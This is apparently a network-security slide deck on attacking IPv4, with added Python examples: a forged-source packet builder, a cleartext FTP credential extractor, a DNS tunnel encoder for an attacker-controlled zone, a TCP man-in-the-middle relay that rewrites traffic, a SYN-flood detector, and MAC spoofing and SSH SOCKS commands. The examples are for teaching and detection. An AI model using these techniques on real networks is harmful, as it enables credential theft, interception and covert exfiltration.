3. AGENDA
ATTACKING IPV4
PASSIVE
ACTIVE
COMMON TYPES OF ATTACK + HANDS ON
EAVESDROPPING
SNIFFER ATTACK
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
4. AGENDA
COMMON TYPES OF ATTACK
SPOOFING
TUNNELING
MAN-IN-THE-MIDDLE (MITM) ATTACK
DENIAL OF SERVICE ATTACK
DEFENCE
5. NETWORK LAYER
NO. 3 IN THE OSI MODEL
PROVIDES THE FUNCTIONAL AND PROCEDURAL MEANS
OF TRANSFERRING VARIABLE-LENGTH DATA SEQUENCES
FROM A SOURCE HOST TO A DESTINATION HOST ON
ANOTHER NETWORK, WHILE MAINTAINING THE QOS
REQUESTED BY THE TRANSPORT LAYER
FUNCTION: PATH DETERMINATION AND LOGICAL
ADDRESSING; DATA UNIT: PACKET/DATAGRAM
IP (IPV4, IPV6), ICMP, IPSEC, IGMP, IPX, APPLETALK
[1]: WIKIPEDIA.ORG
7. INTERNET PROTOCOL
RESPONSIBLE FOR ADDRESSING HOSTS AND ROUTING
DATAGRAMS (PACKETS) FROM A SOURCE HOST TO A
DESTINATION HOST ACROSS ONE OR MORE IP
NETWORKS.
[1]: WIKIPEDIA.ORG
8. IPV4
FOURTH REVISION IN THE DEVELOPMENT OF IP AND THE
FIRST VERSION OF THE PROTOCOL WIDELY DEPLOYED
CONNECTIONLESS, BEST EFFORT: DOES NOT GUARANTEE
DELIVERY, IN-ORDER ARRIVAL, OR THE ABSENCE OF
DUPLICATES
32-BIT ADDRESS, E.G. 192.168.0.1
NO AUTHENTICATION OF THE SOURCE ADDRESS; IPSEC IS OPTIONAL
[1]: WIKIPEDIA.ORG
9. IPV6
SUCCESSOR OF IPV4 WITH A NUMBER OF IMPROVEMENTS
NEW, SIMPLIFIED PACKET HEADER
MULTICAST (MULTIPLE DESTINATIONS IN A SINGLE
OPERATION) REPLACES BROADCAST
STATELESS ADDRESS AUTOCONFIGURATION
LARGER ADDRESS SPACE: 128-BIT ADDRESS, E.G. 2001:0db8:85a3:0000:0000:8a2e:0370:7334
IPSEC SUPPORT WAS MANDATORY IN THE ORIGINAL NODE
REQUIREMENTS (RFC 4294); RFC 6434 RELAXED THIS TO A
"SHOULD", SO IN PRACTICE IT IS NOT ALWAYS AVAILABLE
10. IPSEC
PROTOCOL SUITE FOR SECURING INTERNET PROTOCOL
(IP) COMMUNICATIONS BY AUTHENTICATING AND
ENCRYPTING EACH IP PACKET OF A COMMUNICATION
SESSION.
END-TO-END SECURITY SCHEME AT THE NETWORK LAYER
PROTECTS ANY APPLICATION TRAFFIC ACROSS AN IP
NETWORK WITHOUT CHANGES TO THE APPLICATION
AUTHENTICATION HEADER (AH): INTEGRITY AND ORIGIN
AUTHENTICATION, NO CONFIDENTIALITY; ENCAPSULATING
SECURITY PAYLOAD (ESP): CONFIDENTIALITY PLUS OPTIONAL
INTEGRITY; SECURITY ASSOCIATIONS (SA): THE NEGOTIATED
KEYS AND ALGORITHMS FOR ONE DIRECTION OF TRAFFIC
14. ATTACKING IPV4
THE SECURITY ISSUE LIES IN THE INTERNET PROTOCOL
ITSELF (NETWORK LAYER): NO AUTHENTICATION OF
ADDRESSES AND NO ENCRYPTION; IPSEC IS OPTIONAL
UPPER-LAYER PROTOCOLS WERE CREATED WITHOUT
SECURITY CONSIDERATIONS AND SEND CREDENTIALS
AND DATA IN CLEARTEXT
TCP-BASED EXAMPLES: FTP, TELNET, SMTP, POP3
15. ATTACKING IPV4
PASSIVE: NETWORK PACKET INFORMATION IS ONLY
MONITORED, NOTHING ON THE WIRE CHANGES;
ACTIVE: NETWORK PACKET INFORMATION IS ALTERED
WITH THE INTENT TO MODIFY, CORRUPT, OR DESTROY THE
DATA OR THE NETWORK.
16. EAVESDROPPING
THE MAJORITY OF NETWORK COMMUNICATIONS OCCUR
IN UNSECURED OR "CLEARTEXT" FORMAT
THE ABILITY TO MONITOR NETWORK COMMUNICATION
IS ONE OF THE BIGGEST SECURITY PROBLEMS WE FACE
VANTAGE POINTS: A HUB (EVERY PORT SEES EVERY FRAME),
OR ACCESS TO THE GATEWAY/ROUTER DEVICE THAT ALL
TRAFFIC PASSES THROUGH
17. SNIFFER ATTACK
A SNIFFER IS AN APPLICATION OR DEVICE THAT CAN READ,
MONITOR, AND CAPTURE NETWORK PACKETS.
IF THE PACKET IS NOT ENCRYPTED THE ATTACKER CAN VIEW
THE FULL DATA INSIDE THE PACKET
IF THE PACKET IS ENCRYPTED THE ATTACKER NEEDS TO
CREATE/OBTAIN/HAVE A VALID KEY
A PACKET THAT IS ONLY TUNNELLED (ENCAPSULATED, NOT
ENCRYPTED) CAN ALSO BE BROKEN OPEN AND READ
20. SPOOFING
SPOOF = MASQUERADE[1]
A SITUATION IN WHICH A PROGRAM SUCCESSFULLY
MASQUERADES AS ANOTHER BY FALSIFYING DATA AND
THEREBY GAINING AN ILLEGITIMATE ADVANTAGE[2]
[1]: RFC4949
[2]: WIKIPEDIA.ORG
21. SPOOFING
IP SPOOFING, E.G. MODIFYING THE SOURCE ADDRESS OF
OUTGOING PACKETS; NOTHING IN IPV4 VERIFIES IT
A COMMON MISCONCEPTION: IP SPOOFING CAN BE USED
TO HIDE AN IP ADDRESS WHILE SURFING THE INTERNET,
CHATTING ONLINE, AND SO FORTH. THIS IS GENERALLY
NOT TRUE. FORGING THE SOURCE IP ADDRESS CAUSES
THE RESPONSES TO BE MISDIRECTED TO THE FORGED
ADDRESS, SO A NORMAL TWO-WAY CONNECTION CANNOT
BE ESTABLISHED.[1]
USUALLY COMBINED WITH NETWORK DOS/DDOS ATTACKS,
WHERE NO REPLY IS NEEDED
[1]: ISS.NET
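Worked example added by the editor, not part of the original slides, tying together slide 8 (the IPv4 header), slide 17 (what a sniffer sees on the wire) and this slide (a forged source address). The Python below builds IPv4/TCP packets with valid header and TCP checksums, decodes them the way a sniffer does, and pulls USER/PASS lines out of traffic to the cleartext services listed on slide 14. All addresses and credentials are constructed (documentation ranges 192.0.2.0/24 and 203.0.113.0/24, a made-up "alice"/"s3cret"); `build_ipv4_tcp`, `parse_ipv4_tcp` and `extract_credentials` are names chosen here, not a library API.

```python
import struct

# Added example (not from the slides). Hosts and credentials are constructed:
# 192.0.2.0/24 and 203.0.113.0/24 are documentation ranges, "alice"/"s3cret" are made up.

def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 checksum used by IPv4 and TCP: one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def ip2bytes(addr: str) -> bytes:
    return bytes(int(octet) for octet in addr.split("."))

def build_ipv4_tcp(src_ip, dst_ip, sport, dport, payload=b"", flags=0x18, ttl=64):
    """Build an IPv4 datagram carrying a minimal TCP segment (no options).
    src_ip is whatever the caller writes: the IPv4 header carries no proof of origin,
    which is exactly what IP spoofing exploits."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0) + payload
    # TCP checksum covers a pseudo-header (src, dst, zero, protocol 6, TCP length) plus the segment
    pseudo = ip2bytes(src_ip) + ip2bytes(dst_ip) + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", ones_complement_sum(pseudo + tcp)) + tcp[18:]
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, ttl, 6, 0,
                      ip2bytes(src_ip), ip2bytes(dst_ip))
    hdr = hdr[:10] + struct.pack("!H", ones_complement_sum(hdr)) + hdr[12:]
    return hdr + tcp

def parse_ipv4_tcp(pkt: bytes) -> dict:
    """Decode a datagram the way a sniffer does: header fields, checksum validity, payload."""
    ver_ihl, _, total_len, _, _, ttl, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (ver_ihl & 0x0F) * 4
    info = {"src": ".".join(map(str, src)), "dst": ".".join(map(str, dst)), "ttl": ttl,
            "proto": proto, "ip_checksum_ok": ones_complement_sum(pkt[:ihl]) == 0, "payload": b""}
    if proto == 6:
        seg = pkt[ihl:total_len]
        sport, dport, _, _, off, flags = struct.unpack("!HHIIBB", seg[:14])
        pseudo = src + dst + struct.pack("!BBH", 0, 6, len(seg))
        info.update(sport=sport, dport=dport, flags=flags, payload=seg[(off >> 4) * 4:],
                    tcp_checksum_ok=ones_complement_sum(pseudo + seg) == 0)
    return info

CLEARTEXT_PORTS = {21: "FTP", 23: "TELNET", 25: "SMTP", 110: "POP3"}

def extract_credentials(pkt: bytes):
    """Return (service, keyword, value) for USER/PASS lines sent to a cleartext service.
    Telnet is listed but left out: its login is echoed one keystroke per segment."""
    info = parse_ipv4_tcp(pkt)
    service = CLEARTEXT_PORTS.get(info.get("dport"))
    found = []
    if service and info["payload"]:
        for line in info["payload"].decode("ascii", "replace").splitlines():
            parts = line.strip().split(" ", 1)
            if len(parts) == 2 and parts[0].upper() in ("USER", "PASS"):
                found.append((service, parts[0].upper(), parts[1]))
    return found

# Constructed traffic: a cleartext FTP login, and a SYN whose source address is forged.
FTP_LOGIN = build_ipv4_tcp("192.0.2.10", "192.0.2.20", 40000, 21,
                           b"USER alice\r\nPASS s3cret\r\n")
SPOOFED_SYN = build_ipv4_tcp("203.0.113.77", "192.0.2.20", 12345, 80, flags=0x02)

if __name__ == "__main__":
    print(extract_credentials(FTP_LOGIN))      # the sniffer's view of a slide 14 protocol
    syn = parse_ipv4_tcp(SPOOFED_SYN)
    # Both checksums are valid, so nothing on the path rejects the forged packet; the
    # SYN/ACK goes to 203.0.113.77, not to whoever sent it, so no handshake completes.
    print(syn["src"], syn["ip_checksum_ok"], syn["tcp_checksum_ok"])
```

The point the spoofed SYN makes is the one this slide states: the packet is perfectly well-formed and is accepted, but the reply is routed to the forged address, so spoofing buys a one-way channel only, which is why it pairs with flooding rather than with interactive use.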
22. HANDS ON
MAC SPOOFING (LINUX, NET-TOOLS SYNTAX; INTERFACE MUST BE DOWN):
ifconfig <iface> hw ether <new-mac>
23. TUNNELING
A TUNNEL IS A COMMUNICATION CHANNEL CREATED IN A
COMPUTER NETWORK BY ENCAPSULATING (I.E.,
LAYERING) A COMMUNICATION PROTOCOL'S DATA
PACKETS IN (I.E., ABOVE) A SECOND PROTOCOL THAT
NORMALLY WOULD BE CARRIED ABOVE, OR AT THE SAME
LAYER AS, THE FIRST ONE. [1]
COMMON CARRIERS: HTTP, SSH, DNS, ICMP
E.G. A SOCKS PROXY OVER SSH: ssh -D <port> foo@doo
[1]: RFC4949
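Worked example added by the editor, not from the slides: the encapsulation step of a DNS tunnel, one of the carriers listed above. Arbitrary bytes are packed into query names for a zone the attacker controls, and the authoritative server for that zone reassembles them. `t.example` is a hypothetical zone and the payload is constructed; the label and name limits come from RFC 1035 (63 octets per label, 255 per name, 253 in text form). The receiver side deliberately handles two things real resolvers do to tunnel traffic: retry (duplicates) and reorder.

```python
import base64

# Added example (not from the slides): the encapsulation step of a DNS tunnel.
# TUNNEL_DOMAIN is a hypothetical attacker-controlled zone; the payload is constructed.
# Base32 keeps labels within the letter/digit hostname alphabet and survives resolvers
# that fold case.

TUNNEL_DOMAIN = "t.example"
MAX_LABEL = 63
MAX_NAME = 253
CHUNK = 100   # bytes per query: 100 bytes -> 160 base32 chars -> 3 labels, well under MAX_NAME

def encode_chunk(seq: int, data: bytes, domain: str = TUNNEL_DOMAIN) -> str:
    """Wrap one chunk as <seq>.<base32 labels>.<domain>; seq lets the receiver reorder."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    name = ".".join([str(seq), *labels, domain])
    if len(name) > MAX_NAME:
        raise ValueError("chunk does not fit in one query name")
    return name

def decode_name(name: str, domain: str = TUNNEL_DOMAIN):
    """Inverse of encode_chunk; None for names that are not tunnel traffic for our zone."""
    if not name.endswith("." + domain):
        return None
    seq, *labels = name[:-len(domain) - 1].split(".")
    b32 = "".join(labels).upper()
    try:
        # restore the '=' padding stripped on the way out (base32 pads to a multiple of 8)
        return int(seq), base64.b32decode(b32 + "=" * (-len(b32) % 8))
    except ValueError:          # non-numeric seq or non-base32 labels: not ours
        return None

def tunnel_send(data: bytes, chunk: int = CHUNK):
    """Client side: split data into numbered chunks, one query name each."""
    return [encode_chunk(i, data[off:off + chunk])
            for i, off in enumerate(range(0, len(data), chunk))]

def tunnel_receive(names):
    """Authoritative-server side: reassemble. Resolvers retry and may reorder queries,
    so duplicates are dropped and chunks are ordered by seq, not by arrival."""
    chunks = {}
    for name in names:
        decoded = decode_name(name)
        if decoded is not None:
            chunks.setdefault(decoded[0], decoded[1])
    return b"".join(chunks[k] for k in sorted(chunks))

if __name__ == "__main__":
    names = tunnel_send(b"id=0(root) gid=0(root)\n" * 20)
    print(len(names), "queries, longest name", max(map(len, names)), "chars")
    # arrival reversed and the first three queries retried: still reassembles correctly
    assert tunnel_receive(names[::-1] + names[:3]) == b"id=0(root) gid=0(root)\n" * 20
```

What makes this visible to a defender follows directly from the encoding: names near the length limit, labels of high-entropy base32 text, and a large number of distinct names all ending in the same zone. Only the data channel is shown; a real tunnel also has to carry the return direction in answer records.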
25. MAN-IN-THE-MIDDLE
A FORM OF ATTACK IN WHICH THE ATTACKER MAKES
INDEPENDENT CONNECTIONS WITH THE VICTIMS AND
RELAYS MESSAGES BETWEEN THEM, MAKING THEM
BELIEVE THAT THEY ARE TALKING DIRECTLY TO EACH
OTHER, WHEN IN FACT THE ENTIRE CONVERSATION IS
CONTROLLED BY THE ATTACKER.
THE ATTACKER IMPERSONATES EACH ENDPOINT TO THE
SATISFACTION OF THE OTHER, AND CAN READ OR ALTER
EVERY MESSAGE IN TRANSIT
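Worked example added by the editor, not from the slides: the mechanical core of the definition above, a transparent TCP relay. The attacker holds two independent connections (one from the victim client, one to the real server) and forwards between them, so every byte is visible and editable in transit. Everything runs on 127.0.0.1 against a stand-in server with a constructed FTP-style exchange; how the victim's traffic gets steered to the relay in the first place (ARP, DNS or routing tricks) is a separate step not shown here. `start_relay`, `start_server` and `demo` are names chosen for this example.

```python
import socket
import threading

# Added example (not from the slides): a transparent TCP relay as the core of a MITM.
# Runs entirely on 127.0.0.1 with a constructed FTP-like exchange; no real hosts involved.

def _pump(src, dst, log, tag, rewrite):
    """Forward src -> dst until EOF, logging the original bytes and applying `rewrite`."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            log.append((tag, data))            # the attacker's copy of the cleartext
            dst.sendall(rewrite(tag, data))    # what the other side actually receives
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)       # propagate the half-close to the other side
        except OSError:
            pass

def start_relay(target, log, rewrite=lambda tag, data: data):
    """Listen on an ephemeral port; for every client open our own connection to `target`
    and relay both directions. Returns the port the victim should be steered to."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)

    def accept_loop():
        while True:
            try:
                client, _ = listener.accept()
                server = socket.create_connection(target, timeout=5)
            except OSError:
                return
            threading.Thread(target=_pump, args=(client, server, log, "c->s", rewrite), daemon=True).start()
            threading.Thread(target=_pump, args=(server, client, log, "s->c", rewrite), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener.getsockname()[1]

def start_server():
    """Stand-in for the real service: answers a cleartext USER command and hangs up."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)

    def serve():
        while True:
            try:
                conn, _ = listener.accept()
            except OSError:
                return
            with conn:
                request = conn.recv(4096)
                if request.startswith(b"USER "):
                    conn.sendall(b"331 Password required for " + request[5:].strip() + b"\r\n")
                else:
                    conn.sendall(b"500 Unknown command\r\n")

    threading.Thread(target=serve, daemon=True).start()
    return listener.getsockname()[1]

def demo():
    """The victim talks to the relay believing it is the server; the relay both reads the
    cleartext login and rewrites the username before the server sees it."""
    log = []
    server_port = start_server()
    tamper = lambda tag, data: data.replace(b"alice", b"mallory") if tag == "c->s" else data
    relay_port = start_relay(("127.0.0.1", server_port), log, tamper)
    with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as victim:
        victim.sendall(b"USER alice\r\n")
        reply = victim.recv(4096)
    return reply, log

if __name__ == "__main__":
    print(demo())
```

Neither endpoint can tell the difference: the client got a well-formed server reply and the server got a well-formed login, just not the one the client sent. That is also the argument for end-to-end authentication (TLS, SSH host keys, IPsec AH/ESP): a relay can copy and rewrite bytes, but it cannot produce a valid signature or MAC for the endpoint it is impersonating.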
28. DENIAL OF SERVICE
THE PREVENTION OF AUTHORIZED ACCESS TO A SYSTEM
RESOURCE OR THE DELAYING OF SYSTEM OPERATIONS
AND FUNCTIONS. [1]
PING OF DEATH (OVERSIZED ICMP PACKET), ICMP
FLOODING, SYN FLOOD
DISTRIBUTED DOS (DDOS) FROM A BOTNET
[1]: RFC4949
29. DENIAL OF SERVICE
A DOS ATTACKER MAY:
ATTEMPT TO FLOOD A NETWORK, THEREBY
PREVENTING LEGITIMATE NETWORK TRAFFIC
ATTEMPT TO DISRUPT CONNECTIONS BETWEEN TWO
MACHINES, THEREBY PREVENTING ACCESS TO A
SERVICE
ATTEMPT TO PREVENT A PARTICULAR INDIVIDUAL FROM
ACCESSING A SERVICE
ATTEMPT TO DISRUPT SERVICE TO A SPECIFIC SYSTEM.
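Worked example added by the editor, not from the slides, for the defence side of the SYN flood named on slide 28: detection logic run over constructed connection records of the kind a sensor or flow export produces, (time, source, destination, port, TCP flags). The threshold and window are illustrative, and addresses are documentation ranges. The design choice worth noticing is that counting is per destination rather than per source: a flood that uses spoofed sources (slide 21) spreads its SYNs over random forged addresses, so a per-source threshold never trips.

```python
from collections import defaultdict

# Added example (not from the slides): detecting a SYN flood from connection records.
# Records are constructed (time_s, src, dst, dport, tcp_flags) tuples; addresses are
# documentation ranges. Flag bits as in the TCP header.
SYN, ACK = 0x02, 0x10

def detect_syn_flood(records, window=1.0, threshold=50):
    """Return {(dst, dport): peak} for destinations that accumulate more than `threshold`
    half-open handshakes (a SYN never followed by an ACK from the same client) within
    any `window` seconds. Counting is per destination, not per source: a spoofed flood
    spreads its SYNs across random forged sources, so a per-source threshold never trips."""
    completed = {(src, dst, dport) for _, src, dst, dport, flags in records
                 if flags & ACK and not flags & SYN}
    half_open = defaultdict(list)
    for t, src, dst, dport, flags in records:
        if flags == SYN and (src, dst, dport) not in completed:
            half_open[(dst, dport)].append(t)
    alerts = {}
    for key, times in half_open.items():
        times.sort()
        start = 0
        for i, t in enumerate(times):
            while times[start] < t - window:   # slide the window's left edge forward
                start += 1
            count = i - start + 1
            if count > threshold:
                alerts[key] = max(alerts.get(key, 0), count)
    return alerts

def sample_records():
    """Constructed traffic: 20 normal clients completing handshakes to :80 over 10 s,
    300 spoofed SYNs to :80 in 0.3 s from 254 different forged sources, and 30 SYNs
    to :443 in 0.03 s (noisy, but under the threshold)."""
    recs = []
    for i in range(20):
        recs.append((i * 0.5, f"192.0.2.{i + 1}", "192.0.2.20", 80, SYN))
        recs.append((i * 0.5 + 0.01, f"192.0.2.{i + 1}", "192.0.2.20", 80, ACK))
    for i in range(300):
        recs.append((5.0 + i * 0.001, f"203.0.113.{i % 254 + 1}", "192.0.2.20", 80, SYN))
    for i in range(30):
        recs.append((6.0 + i * 0.001, f"203.0.113.{i + 1}", "192.0.2.20", 443, SYN))
    return recs

if __name__ == "__main__":
    print(detect_syn_flood(sample_records()))   # flags only ("192.0.2.20", 80)
```

The legitimate clients never count because their ACK completes the handshake, and no single forged source appears often enough to stand out; what does stand out is the pile of half-open connections on one listener, which is also the resource (the backlog) the attack is exhausting.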